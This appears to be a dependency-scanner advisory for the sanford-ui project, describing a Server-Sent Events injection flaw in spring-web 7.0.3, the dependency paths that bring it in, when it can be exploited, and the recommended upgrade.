  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.cloud:spring-cloud-starter-openfeign@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 org.springframework.cloud:spring-cloud-starter-openfeign@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.0.5 org.springframework:spring-web@7.0.3
  • Introduced through: cf-toolsuite/sanford-ui@cf-toolsuite/sanford-ui#6e9f180ccb89cba71dee859309ae3de774f0a516 com.vaadin:vaadin-spring-boot-starter@25.1.1 org.springframework.boot:spring-boot-starter-webmvc@4.0.5 org.springframework.boot:spring-boot-starter-tomcat@4.0.5 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.0.5 org.springframework.boot:spring-boot-tomcat@4.0.5 org.springframework.boot:spring-boot-web-server@4.1.0-M4 org.springframework:spring-web@7.0.3

Overview

org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.

Affected versions of this package are vulnerable to Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'). The vulnerability exists in the handling of Server-Sent Events (SSE) when streaming plain text data. An attacker can inject crafted data into the event stream, breaking message boundaries and corrupting the stream delivered to other clients. By controlling streamed content, an attacker can manipulate how subsequent events are parsed by the client, potentially altering application state or injecting misleading data.

Note:

This is only exploitable if the application streams attacker-controlled data via SSE using unstructured/plain-text messages instead of a structured format (e.g., JSON).

Remediation

Upgrade org.springframework:spring-web to version 6.2.17, 7.0.6 or higher.

References

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability report